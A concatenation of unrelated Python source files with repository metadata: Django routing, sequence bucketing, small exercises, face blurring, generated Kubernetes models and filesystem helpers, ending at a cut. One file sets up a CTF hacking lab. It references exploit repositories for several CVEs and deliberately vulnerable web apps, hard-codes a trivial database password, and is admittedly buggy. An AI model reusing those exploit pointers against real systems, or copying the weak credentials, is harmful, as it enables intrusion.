blob_id: bb46be63f9d1cdf94fd65e570db8ba625ebc5aa6
directory_id: afeebc0d22854f902ca19749a9ffb67903676b1f
path: /blog_project/blog_project/urls.py
content_id: 1ebd317125d4a1574c4bbebcaafd602537b75263
detected_licenses: [] | license_type: no_license
repo_name: sachinmukati/blog_project
snapshot_id: 3099f35c0907c2af06337e6f23f75b2ef4a40371
revision_id: fca9826ad37e9ded8034f7c650e86e0fa5286167
branch_name: refs/heads/master
visit_date: 2020-05-31T15:07:05.323105 | revision_date: 2019-06-05T07:31:01 | committer_date: 2019-06-05T07:31:01
github_id: 190,348,059 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 935 | extension: py
content:
"""blog_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from blog import views
urlpatterns = [
path('admin/', admin.site.urls),
path("",views.post_list_view ,name="post_list"),
path("post/<int:year>/<int:month>/<int:day>/<slug:slug>",views.post_detail_view, name="post_detail")
]
authors: ["sachinmukati47@gmail.com"]
author_id: sachinmukati47@gmail.com

blob_id: 7bc1327530d462d815ff6112d9610deb874945d7
directory_id: e773ad635ae390edf5dea09195b33672c6597dbe
path: /tfmiss/training/bucket.py
content_id: 2ebf4389c1f2a223d1ef60f9118b9dd8c27d71c4
detected_licenses: ["MIT"] | license_type: permissive
repo_name: Viach/tfmiss
snapshot_id: 3e6c85b097140e29d60203d82361c14900ea09f4
revision_id: 5be62b8eb43c886746235d8d7d9370ff8e6d5a3a
branch_name: refs/heads/master
visit_date: 2021-01-02T21:04:48.512102 | revision_date: 2020-01-05T10:59:01 | committer_date: 2020-01-05T10:59:01
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 7,677 | extension: py
content:
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from collections import Counter
def init_buckets(len2freq):
"""Splits length-to-frequency mapping into list of initial buckets.
Args:
len2freq: Dict of `sequence length`: `frequency`.
Returns:
List of buckets. Each bucket is a tuple (`bucket boundary`, `subset of len2freq`).
"""
source = Counter(len2freq)
if not len(source):
raise ValueError('Empty length-to-frequency map')
if not all(map(lambda x: isinstance(x, int), source.keys())):
raise ValueError('Keys of length-to-frequency must be integers')
if not all(map(lambda x: isinstance(x, int), source.values())):
raise ValueError('Values of length-to-frequency must be integers')
denominator = 8
lengths = sorted(source.keys())
buckets = []
for lng in lengths:
b = int(np.ceil(lng / denominator)) * denominator + 1
if not len(buckets) or buckets[-1][0] != b:
buckets.append((b, {}))
buckets[-1][1][lng] = source[lng]
return buckets
def waste_frac(bucket):
"""Estimates fraction of `PAD` elements in bucket.
Args:
bucket: A bucket to process.
Returns:
Float in range [0.0; 1.0): `PAD` fraction.
"""
if not isinstance(bucket, tuple) or len(bucket) not in {0, 2}:
raise ValueError('Wrong bucket format')
if not len(bucket):
return 0.0
boundary, len2freq = bucket
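# Sequences in this bucket are padded to length boundary - 1; waste is the PAD share of all padded positions.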
zero_cnt = sum([(boundary - 1 - lng) * f for lng, f in len2freq.items()])
total_freq = sum([f for _, f in len2freq.items()])
return zero_cnt / (total_freq * (boundary - 1))
def merge_buckets(bucket1, bucket2):
"""Merges 2 buckets into one.
Args:
bucket1: First bucket.
bucket2: Second bucket.
Returns:
New bucket with maximum of boundaries and joined length-to-frequency mappings.
"""
if not len(bucket1) and not len(bucket2):
return tuple()
elif not len(bucket1):
return bucket2
elif not len(bucket2):
return bucket1
boundary = max([bucket1[0], bucket2[0]])
len2freq = Counter(bucket1[1]) + Counter(bucket2[1])
return boundary, len2freq
def merge_allowed(merged, buckets, min_waste, max_waste, min_aggr):
"""Checks if bucket merging allowed.
Args:
merged: A merged bucket to test.
buckets: All existing buckets.
min_waste: Minimum waste fraction.
max_waste: Maximum waste fraction
min_aggr: Minimum aggregate fraction.
Returns:
Boolean flag of allowing merge
"""
if not len(merged):
return False
total_freq = sum([f for (_, l2f) in buckets for _, f in l2f.items()])
curr_aggr = sum([f for _, f in merged[1].items()]) * 1.0 / total_freq
curr_waste = waste_frac(merged)
return curr_waste < min_waste or curr_waste < max_waste and curr_aggr < min_aggr
def group_buckets(before, middle, after, min_waste, max_waste, min_aggr):
"""Merges buckets one by one from `before` and `after` into middle until merging allowed.
Args:
before: List of buckets before `middle`.
middle: Current bucket to expand.
after: List of buckets after `middle`.
min_waste: Minimum waste fraction.
max_waste: Maximum waste fraction
min_aggr: Minimum aggregate fraction.
Returns:
Re-grouped `before`, `middle` and `after` buckets.
"""
last_size = 0
while len(middle[1]) > last_size:
last_size = len(middle[1])
left = before[-1] if len(before) else tuple()
right = after[0] if len(after) else tuple()
with_left = merge_buckets(left, middle)
with_right = merge_buckets(right, middle)
waste_left = waste_frac(with_left)
waste_right = waste_frac(with_right)
all_buckets = before + [middle] + after
allow_left = merge_allowed(with_left, all_buckets, min_waste, max_waste, min_aggr)
allow_right = merge_allowed(with_right, all_buckets, min_waste, max_waste, min_aggr)
if allow_left and (not allow_right or waste_left < waste_right):
before = before[:-1]
middle = with_left
elif allow_right and (not allow_left or waste_right < waste_left):
middle = with_right
after = after[1:]
return before, middle, after
def estimate_bucket_boundaries(len2freq, min_waste=0.01, max_waste=0.1, min_aggr=0.01):
"""Estimates and merges buckets from the most common (middle).
By default tries to make buckets with more than 1% of samples and no more than 1% of padding,
or at least no more than 10% of padding.
Args:
len2freq: Dict of `sequence length`: `frequency`.
min_waste: Minimum waste fraction.
max_waste: Maximum waste fraction
min_aggr: Minimum aggregate fraction.
Returns:
List of integer bucket boundaries.
"""
buckets = init_buckets(len2freq)
sizes = [sum(l2f.values()) for _, l2f in buckets]
start = sizes.index(max(sizes))
before = buckets[:start]
middle = buckets[start]
after = buckets[start + 1:]
before, middle, after = group_buckets(before, middle, after, min_waste, max_waste, min_aggr)
result = [middle]
while len(before):
middle = before[-1]
before = before[:-1]
before, middle, _ = group_buckets(before, middle, result + after, min_waste, max_waste, min_aggr)
result = [middle] + result
while len(after):
middle = after[0]
after = after[1:]
_, middle, after = group_buckets(result, middle, after, min_waste, max_waste, min_aggr)
result = result + [middle]
original = Counter(len2freq)
restored = sum([Counter(r[1]) for r in result], Counter())
assert set(original.keys()) == set(restored.keys())
assert set(original.values()) == set(restored.values())
return [r[0] for r in result]
def estimate_bucket_pipeline(bucket_boundaries, num_samples, safe=True):
"""Estimates bach sizes and reduces bucket boundaries to fit required number of samples per batch.
Args:
bucket_boundaries: pre-estimated bucket boundaries (see `estimate_bucket_boundaries`).
num_samples: number of samples per batch (same as `batch size` / `sequence length`).
safe: Do not allow maximum number of samples to be greater then `num_samples`.
Returns:
A tuple of (`reduced bucket boundaries`, `batch sizes`, `maximum boundary`).
Bucket boundaries and batch sizes must be supplied to `tf.data.experimental.bucket_by_sequence_length`.
Maximum boundary should be used to filter out too long sequences
with `tf.data.Dataset.filter` (`length` < `max_boundary`).
"""
if len(bucket_boundaries) < 2:
raise ValueError('Bucket boundaries must contain at least 2 values')
batch_step = 8
batch_sizes = []
for boundary in bucket_boundaries:
batch_size = num_samples / (boundary - 1)
batch_size = np.floor(batch_size / batch_step) if safe \
else np.round(batch_size / batch_step)
batch_size = batch_step * batch_size
if safe and batch_size < batch_step:
if len(batch_sizes) < 2:
raise ValueError('Too few samples per batch')
return bucket_boundaries[:len(batch_sizes) - 1], batch_sizes, bucket_boundaries[len(batch_sizes) - 1]
batch_sizes.append(max(batch_step, batch_size.astype(int)))
return bucket_boundaries[:-1], batch_sizes, bucket_boundaries[-1]
authors: ["shkarupa.alex@gmail.com"]
author_id: shkarupa.alex@gmail.com

blob_id: a875dc520eaf84abf297ead360e28a7eaa9d5466
directory_id: ba3c1c99c4a05aaed304e5637367a1605e1b9b29
path: /CS30/Chapter 6/6-02.py
content_id: 908eec084aa77b72612496e0ab23758cb71ddc3c
detected_licenses: [] | license_type: no_license
repo_name: JackMorash/School-Work
snapshot_id: 416e3aea52162988ee858400cd3768055ef1ae5c
revision_id: b947a511806cf2d065090bec97369c7265c116b5
branch_name: refs/heads/master
visit_date: 2021-07-16T14:48:35.006897 | revision_date: 2021-02-11T14:38:11 | committer_date: 2021-02-11T14:38:11
github_id: 237,064,054 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 490 | extension: py
content:
favorite_numbers = {
'jack': 42,
'arden': 69,
'ali': 72,
'dan': 100_000_000,
'chris': 64,
}
num = favorite_numbers['jack']
print(f"Jack's favorite number is {num}.")
num = favorite_numbers['arden']
print(f"Arden's favorite number is {num}.")
num = favorite_numbers['ali']
print(f"Ali's favorite number is {num}.")
num = favorite_numbers['dan']
print(f"Dan's favorite number is {num}.")
num = favorite_numbers['chris']
print(f"Chris's favorite number is {num}.")
authors: ["jack.morash@rbe.sk.ca"]
author_id: jack.morash@rbe.sk.ca

blob_id: 86b6a28c3e04e1eb9c71d17a6812bf9b6afc2731
directory_id: ca7aa979e7059467e158830b76673f5b77a0f5a3
path: /Python_codes/p03767/s129453920.py
content_id: 5c1778e2def9367f90af9044d960c69bd4c5a88b
detected_licenses: [] | license_type: no_license
repo_name: Aasthaengg/IBMdataset
snapshot_id: 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
revision_id: f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
branch_name: refs/heads/main
visit_date: 2023-04-22T10:22:44.763102 | revision_date: 2021-05-13T17:27:22 | committer_date: 2021-05-13T17:27:22
github_id: 367,112,348 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 130 | extension: py
content:
n = int(input())
a = list(map(int,input().split()))
a.sort(reverse=True)
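# Greedy: with the list sorted in descending order, sum every second element (indices 1, 3, ..., 2n-1).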
c = 0
t = 1
while t < 2*n:
c += a[t]
t += 2
print(c)
authors: ["66529651+Aastha2104@users.noreply.github.com"]
author_id: 66529651+Aastha2104@users.noreply.github.com

blob_id: 3d0d165842a0b1587940d6dddd407f143f2cfab2
directory_id: b4b6b2ab5fb71ae33120e88d31092f783319e15c
path: /python_server/blur_utils.py
content_id: 1d06a74f80e2a26ccd5e0ae6c0eafa3ce6c1572c
detected_licenses: [] | license_type: no_license
repo_name: jungdj/AI-Effects
snapshot_id: 62bf58265c361d59b417a6a1140c00e58c128077
revision_id: d268bb8ccbfb3afd6a4b6defcb6ddfe71d58d85e
branch_name: refs/heads/master
visit_date: 2023-01-12T07:54:54.212168 | revision_date: 2020-01-01T11:22:11 | committer_date: 2020-01-01T11:22:11
github_id: 225,296,917 | star_events_count: 63 | fork_events_count: 12
gha_license_id: null | gha_event_created_at: 2023-01-05T02:07:58 | gha_created_at: 2019-12-02T05:58:57 | gha_language: PureBasic
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 669 | extension: py
content:
import cv2
import video_utils
import face_models
def blurAllFaces(video_path, output_path):
model = "input/res10_300x300_ssd_iter_140000.caffemodel"
prototxt = "input/deploy.prototxt"
confidence = 0.5
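# Load OpenCV's pretrained Caffe SSD face detector, then blur every detected face frame by frame.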
net = cv2.dnn.readNetFromCaffe(prototxt, model)
video_utils.processVideo(video_path, output_path, face_models.faceDetectBlur, net, confidence)
def blurOtherFaces(video_path, output_path, knowns):
fr = face_models.FaceRecog(video_path, 0.38, knowns)
video_utils.processVideo(video_path, output_path, fr.faceRecogBlur)
# blurAllFaces('media/sample1.mov', 'media/output1.mp4')
# blurOtherFaces('uploads/yunayoona.mov', 'blur_yunayoona.mp4')
authors: ["yunaseol@kaist.ac.kr"]
author_id: yunaseol@kaist.ac.kr

blob_id: fb32b974467f11a8db72190740b083190837ba11
directory_id: f8b5ecb793111412e6aa4c93a94f09ef21151df3
path: /__main__.py
content_id: 5a996f97472a464fbcc384c1487ade66b1b4950f
detected_licenses: ["MIT"] | license_type: permissive
repo_name: mister-hai/sandboxy
snapshot_id: 355baef1c0c1ed7f1574833f611963197c9b2856
revision_id: 861fc4eb37bb37db10e0123150f587c997b146e3
branch_name: refs/heads/master
visit_date: 2023-08-23T13:58:21.557680 | revision_date: 2021-10-23T15:46:49 | committer_date: 2021-10-23T15:46:49
github_id: 396,319,892 | star_events_count: 5 | fork_events_count: 1
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 6,948 | extension: py
content:
# This file is going to be the main file after start.sh I guess?
# HUGE TODO: SET PATHS CORRECTLY EVERYTHING IS BROKENNNN!!!!!
# repository managment
from ctfcli.__main__ import Ctfcli
from ctfcli.utils.utils import greenprint,errorlogger
# basic imports
import subprocess
import os,sys,fire
from pathlib import Path
from pygments import formatters, highlight, lexers
from pygments.util import ClassNotFound
from simple_term_menu import TerminalMenu
def highlight_file(filepath):
with open(filepath, "r") as f:
file_content = f.read()
try:
lexer = lexers.get_lexer_for_filename(filepath, stripnl=False, stripall=False)
except ClassNotFound:
lexer = lexers.get_lexer_by_name("text", stripnl=False, stripall=False)
formatter = formatters.TerminalFormatter(bg="dark") # dark or light
highlighted_file_content = highlight(file_content, lexer, formatter)
return highlighted_file_content
def list_files(directory="."):
return (file for file in os.listdir(directory) if os.path.isfile(os.path.join(directory, file)))
def main():
terminal_menu = TerminalMenu(list_files(), preview_command=highlight_file, preview_size=0.75)
menu_entry_index = terminal_menu.show()
################################################################################
############## Master Values #################
################################################################################
sys.path.insert(0, os.path.abspath('.'))
#Before we load the menu, we need to do some checks
# The .env needs to be reloaded in the case of other alterations
#
# Where the terminal is located when you run the file
PWD = os.path.realpath(".")
#PWD_LIST = os.listdir(PWD)
#where the script itself is located
# ohh look a global
global PROJECT_ROOT
PROJECT_ROOT = Path(os.path.dirname(__file__))
global CHALLENGEREPOROOT
CHALLENGEREPOROOT=Path(PROJECT_ROOT,'/data/CTFd')
###############################################################################
###############################################################################
## Docker Information ##
###############################################################################
gitdownloads = {
"opsxcq":("exploit-CVE-2017-7494","exploit-CVE-2016-10033"),
"t0kx":("exploit-CVE-2016-9920"),
"helmL64":"https://get.helm.sh/helm-v3.7.0-linux-amd64.tar.gz",
"helmW64":"https://get.helm.sh/helm-v3.7.0-windows-amd64.zip"
}
helmchartrepos = {
"":"helm repo add gitlab https://charts.gitlab.io/",
"":"helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx",
"":"helm repo add prometheus-community https://prometheus-community.github.io/helm-charts",
"":"https://artifacthub.io/packages/helm/slamdev/gitlab-omnibus"
}
helchartinstalls = {
"":"helm install [RELEASE_NAME] prometheus-community/kube-prometheus-stack"
}
#for pi
raspipulls= {
"opevpn" : "cambarts/openvpn",
"webgoat" : "cambarts/webgoat-8.0-rpi",
"bwapp" : "cambarts/arm-bwapp",
"dvwa" : "cambarts/arm-dvwa",
"LAMPstack" : "cambarts/arm-lamp"
}
#for pi
rpiruns = {
"bwapp" : '-d -p 80:80 cambarts/arm-bwapp',
"dvwa" : '-d -p 80:80 -p 3306:3306 -e MYSQL_PASS="password" cambarts/dvwa',
"webgoat" : "-d -p 80:80 -p cambarts/webgoat-8.0-rpi",
"nginx" : "-d nginx",
}
def putenv(key,value):
"""
Puts an environment variable in place
For working in the interactive mode when run with
>>> hacklab.py -- --interactive
"""
try:
os.environ[key] = value
greenprint(f"[+] {key} Env variable set to {value}")
except Exception:
errorlogger(f"[-] Failed to set {key} with {value}")
def setenv(**kwargs):
'''
sets the environment variables given by **kwargs
The double asterisk form of **kwargs is used to pass a keyworded,
variable-length argument dictionary to a function.
'''
try:
if __name__ !="" and len(kwargs) > 0:
projectname = __name__
for key, value in kwargs.items():
putenv(key,value)
putenv("COMPOSE_PROJECT_NAME", projectname)
else:
raise Exception
except Exception:
errorlogger("""[-] Failed to set environment variables!\n
this is an extremely important step and the program must exit now. \n
A log has been created with the information from the error shown, \n
please provide this information to the github issue tracker""")
sys.exit(1)
def certbot(siteurl):
'''
creates cert with certbot
'''
generatecert = 'certbot --standalone -d {}'.format(siteurl)
subprocess.call(generatecert)
def certbotrenew():
renewcert = '''certbot renew --pre-hook "docker-compose -f path/to/docker-compose.yml down" --post-hook "docker-compose -f path/to/docker-compose.yml up -d"'''
subprocess.call(renewcert)
#lol so I know to implement it later
#certbot(siteurl)
def createsandbox():
'''
Creates a sandbox
'''
def runsandbox(composefile):
'''
run a sandbox
Args:
composefile (str): composefile to use
'''
subprocess.Popen(["docker-compose", "up", composefile])
################################################################################
############## The project formerly known as sandboxy #################
################################################################################
class Project():
def __init__(self,projectroot:Path):
self.root = projectroot
self.datadirectory = Path(self.root, "data")
self.extras = Path(self.root, "extra")
self.containerfolder = Path(self.root, "containers")
self.mysql = Path(self.root, "data", "mysql")
self.redis = Path(self.root, "data", "redis")
self.persistantdata = [self.mysql,self.redis]
#def setkubeconfig(self):
# # Configs can be set in Configuration class directly or using helper utility
# self.config = config.load_kube_config()
# self.client = client.CoreV1Api()
def cleantempfiles(self):
"""
Cleans temporary files
"""
for directory in self.persistantdata:
# clean mysql
for file in os.listdir(directory):
if os.path.exists(Path(os.path.abspath(file))):
os.remove(Path(os.path.abspath(file)))
# clean redis
#for file in os.listdir(self.mysql):
# os.remove(Path(os.path.abspath(file)))
class MenuGrouping():
'''
DO NOT MOVE THIS FILE
'''
def __init__(self):
# challenge templates
self.name = "lol"
self.project_actions = Project(PROJECT_ROOT)
self.cli = Ctfcli()
def main():
fire.Fire(MenuGrouping)
if __name__ == "__main__":
main()
#fire.Fire(Ctfcli)
authors: ["asd@gmail.com"]
author_id: asd@gmail.com

blob_id: 427d0aca6a9188d53b543aa4872497ae22682ecf
directory_id: 251d7860b624cf98bc929ef2c1b69aea7bcffb45
path: /templates/common.py
content_id: cce8655fdd4578febacebc9867862a284b899f48
detected_licenses: ["MIT"] | license_type: permissive
repo_name: nfcentral/nf
snapshot_id: 0b556d81cacc550183f8473a72f2add30854200b
revision_id: 25f6cc3bb923cea9876fbbad5d7d54bbb9b3fec2
branch_name: refs/heads/master
visit_date: 2020-04-21T01:26:15.900118 | revision_date: 2019-02-27T23:26:46 | committer_date: 2019-02-27T23:26:46
github_id: 169,223,654 | star_events_count: 2 | fork_events_count: 1
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 237 | extension: py
content:
NAME = "common"
PARENTS = []
FEATURES = []
FILES = {
}
EXAMPLE_FILES = {
"": [("dotgitignore", ".gitignore")]
}
LISTS = {
"gitignore": {
"": [".nf"]
}
}
CONFIG_LISTS = {
}
def prepare(config, context):
pass
authors: ["andrew.kirilenko@gmail.com"]
author_id: andrew.kirilenko@gmail.com

blob_id: 05e342ce7d3576b0224f6113dd76add50000ab2a
directory_id: 8b49ae0bb177c937da6a6ebdacf68365ec5a37ae
path: /kubernetes_spawner/swagger_client/models/v1_cinder_volume_source.py
content_id: 9dd1396704a6e2bf8adec1568dac453efdd0a4b8
detected_licenses: ["Apache-2.0"] | license_type: permissive
repo_name: opendoor-labs/jupyterhub-kubernetes_spawner
snapshot_id: 19728cef7f50d3369d140a22f3977a1e3debd8c3
revision_id: 941360d1899e6a05f66927ae5f260abf1f8590fe
branch_name: refs/heads/master
visit_date: 2021-01-13T09:26:26.140619 | revision_date: 2016-11-02T19:11:20 | committer_date: 2016-11-02T19:11:20
github_id: 72,672,107 | star_events_count: 0 | fork_events_count: 0
gha_license_id: Apache-2.0 | gha_event_created_at: 2021-07-29T19:15:15 | gha_created_at: 2016-11-02T19:04:23 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 5,306 | extension: py
content:
# coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class V1CinderVolumeSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
V1CinderVolumeSource - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'volume_id': 'str',
'fs_type': 'str',
'read_only': 'bool'
}
self.attribute_map = {
'volume_id': 'volumeID',
'fs_type': 'fsType',
'read_only': 'readOnly'
}
self._volume_id = None
self._fs_type = None
self._read_only = None
@property
def volume_id(self):
"""
Gets the volume_id of this V1CinderVolumeSource.
volume id used to identify the volume in cinder More info: http://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:return: The volume_id of this V1CinderVolumeSource.
:rtype: str
"""
return self._volume_id
@volume_id.setter
def volume_id(self, volume_id):
"""
Sets the volume_id of this V1CinderVolumeSource.
volume id used to identify the volume in cinder More info: http://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:param volume_id: The volume_id of this V1CinderVolumeSource.
:type: str
"""
self._volume_id = volume_id
@property
def fs_type(self):
"""
Gets the fs_type of this V1CinderVolumeSource.
Required: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Only ext3 and ext4 are allowed More info: http://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:return: The fs_type of this V1CinderVolumeSource.
:rtype: str
"""
return self._fs_type
@fs_type.setter
def fs_type(self, fs_type):
"""
Sets the fs_type of this V1CinderVolumeSource.
Required: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Only ext3 and ext4 are allowed More info: http://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:param fs_type: The fs_type of this V1CinderVolumeSource.
:type: str
"""
self._fs_type = fs_type
@property
def read_only(self):
"""
Gets the read_only of this V1CinderVolumeSource.
Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. More info: http://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:return: The read_only of this V1CinderVolumeSource.
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""
Sets the read_only of this V1CinderVolumeSource.
Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. More info: http://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:param read_only: The read_only of this V1CinderVolumeSource.
:type: bool
"""
self._read_only = read_only
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
authors: ["df.rodriguez143@gmail.com"]
author_id: df.rodriguez143@gmail.com

blob_id: 264fa3ebf0d566eccac4025c78709e33da52f49b
directory_id: 83685be582c6b3038e24b827b3f9ef7259abe8b5
path: /clowder/util/filesystem.py
content_id: da0bd120e33397a0749030fe62e5ef38b8cb952c
detected_licenses: ["MIT"] | license_type: permissive
repo_name: JrGoodle/clowder
snapshot_id: c87b9e199b038810e06b40a7c6716b03b58f42a1
revision_id: 1438fc8b1bb7379de66142ffcb0e20b459b59159
branch_name: refs/heads/master
visit_date: 2023-09-01T07:24:00.910858 | revision_date: 2023-07-09T21:22:01 | committer_date: 2023-07-09T21:22:01
github_id: 38,194,118 | star_events_count: 17 | fork_events_count: 3
gha_license_id: MIT | gha_event_created_at: 2023-08-14T23:41:46 | gha_created_at: 2015-06-28T09:54:55 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 7,509 | extension: py
content:
"""File system utilities
.. codeauthor:: Joe DeCapo <joe@polka.cat>
"""
# import errno
import fnmatch
import os
import re
import shutil
from pathlib import Path
from typing import List
import clowder.util.command as cmd
def list_subdirectories(path: Path, recursive: bool = False) -> List[Path]:
if recursive:
return [Path(info[0]) for info in os.walk(path)]
else:
paths = [Path(str(p)) for p in os.scandir(path)]
return [f for f in paths if f.is_dir()]
def find_files_with_extension(directory: Path, extension: str) -> List[Path]:
all_files = []
for root, _, files in os.walk(directory):
matching_files = [Path(root, f) for f in files if f.lower().endswith(f'.{extension.lower()}')]
all_files += matching_files
return all_files
def find_files(directory: Path, name: str) -> List[Path]:
all_files = []
for root, dirs, files in os.walk(directory):
matching_files = [Path(root, f) for f in files if f.lower() == name.lower()]
matching_dirs = [Path(root, d) for d in dirs if d.lower() == name.lower()]
all_files += (matching_files + matching_dirs)
return all_files
def find_files_containing_match(directory: Path, match: str) -> List[Path]:
all_files = []
for root, dirs, files in os.walk(directory):
matching_files = [Path(root, f) for f in files if match.lower() in f.lower()]
matching_dirs = [Path(root, d) for d in dirs if match.lower() in d.lower()]
all_files += (matching_files + matching_dirs)
return all_files
def find_rars(directory: Path, match_all: bool = False) -> List[Path]:
all_rar_files = []
for root, dirs, files in os.walk(directory):
rar_files = [Path(root, f) for f in files if f.endswith('.rar')]
if match_all:
all_rar_files += rar_files
continue
tmp_files = []
for file in rar_files:
if file.name[:-4] in dirs:
continue
tmp_files.append(file)
r = re.compile(r"^.+[.]part[0-9][0-9][0-9]?[.]rar$")
if all(r.match(f.name) for f in rar_files):
break
all_rar_files += tmp_files
return all_rar_files
def make_dir(dir_path: Path, exist_ok: bool = False) -> Path:
os.makedirs(dir_path, exist_ok=exist_ok)
return dir_path
def move(input_path: Path, output_path: Path) -> None:
shutil.move(str(input_path), str(output_path))
def remove_dir(dir_path: Path, ignore_errors: bool = False) -> None:
shutil.rmtree(str(dir_path), ignore_errors=ignore_errors)
def remove_file(file: Path) -> None:
os.remove(str(file))
def remove(path: Path) -> None:
if path.is_symlink():
path.unlink()
elif path.is_dir():
remove_dir(path)
elif path.is_file():
remove_file(path)
def is_relative_to(path: Path, prefix: Path) -> bool:
return str(path).startswith(str(prefix))
def replace_path_prefix(path: Path, old_prefix: Path, new_prefix: Path):
# assert path.is_absolute()
# assert path.is_relative_to(old_prefix)
relative_path = path.relative_to(old_prefix)
return new_prefix / relative_path
def listdir(directory: Path) -> List[Path]:
files = os.listdir(directory)
return [directory / f for f in files]
def listdir_matching(directory: Path, pattern: str) -> List[Path]:
files = os.listdir(directory)
matches = fnmatch.filter(files, pattern)
return [directory / m for m in matches]
def unar(file: Path) -> None:
# escaped_file_name = str(file).replace("'", r"\'")
cmd.run(f'unar "{file}"', cwd=file.parent)
def create_backup_file(file: Path) -> None:
"""Copy file to {file}.backup
:param Path file: File path to copy
"""
shutil.copyfile(str(file), f"{str(file)}.backup")
def restore_from_backup_file(file: Path) -> None:
"""Copy {file}.backup to file
:param Path file: File path to copy
"""
shutil.copyfile(f"{file}.backup", file)
# def make_dir(directory: Path, check: bool = True) -> None:
# """Make directory if it doesn't exist
#
# :param str directory: Directory path to create
# :param bool check: Whether to raise exceptions
# """
#
# if directory.exists():
# return
#
# try:
# os.makedirs(str(directory))
# except OSError as err:
# if err.errno == errno.EEXIST:
# LOG.error(f"Directory already exists at {Format.path(directory)}")
# else:
# LOG.error(f"Failed to create directory {Format.path(directory)}")
# if check:
# raise
# def remove_directory(dir_path: Path, check: bool = True) -> None:
# """Remove directory at path
#
# :param str dir_path: Path to directory to remove
# :param bool check: Whether to raise errors
# """
#
# try:
# shutil.rmtree(dir_path)
# except shutil.Error:
# LOG.error(f"Failed to remove directory {Format.path(dir_path)}")
# if check:
# raise
def has_contents(path: Path) -> bool:
return not is_empty_dir(path)
def is_empty_dir(path: Path) -> bool:
if not path.exists() or not path.is_dir():
raise Exception(f"Directory at {path} doesn't exist")
if not os.listdir(path):
return True
else:
return False
def create_file(path: Path, contents: str) -> None:
with path.open('w') as f:
f.write(contents)
assert path.is_file()
assert not path.is_symlink()
assert path.read_text().strip() == contents.strip()
def symlink_to(path: Path, target: Path) -> None:
parent = path.parent
fd = os.open(parent, os.O_DIRECTORY)
os.symlink(target, path, dir_fd=fd)
os.close(fd)
assert path.exists()
assert path.is_symlink()
assert is_relative_symlink_from_to(path, str(target))
def symlink_relative_to(source: Path, target: Path, relative_to: Path) -> None:
"""Create relative symlink
:param Path source: File to create symlink pointing to
:param Path target: Symlink location
:param Path relative_to: Directory source is relative to
:raise ExistingFileError:
:raise MissingSourceError:
"""
source = source.relative_to(relative_to)
try:
path = target.parent
fd = os.open(path, os.O_DIRECTORY)
os.symlink(source, target, dir_fd=fd)
os.close(fd)
except OSError:
